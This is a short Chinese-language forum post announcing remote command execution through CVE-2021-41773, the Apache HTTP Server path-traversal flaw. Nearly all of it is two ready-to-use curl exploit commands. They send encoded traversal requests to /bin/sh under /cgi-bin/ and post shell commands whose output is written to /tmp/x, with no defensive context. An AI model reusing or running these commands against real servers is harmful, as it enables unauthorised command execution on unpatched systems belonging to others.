新漏洞

spr1ng 10天前 12

CVE-2021-41773升级为无码版命令执行[惊恐]
exp:
curl --data "A=|id>>/tmp/x;uname\$IFS-a>>/tmp/x" 'http ://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
curl --data "A=|id>/tmp/x" 'http ://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -vv
最新回复 (15)
返回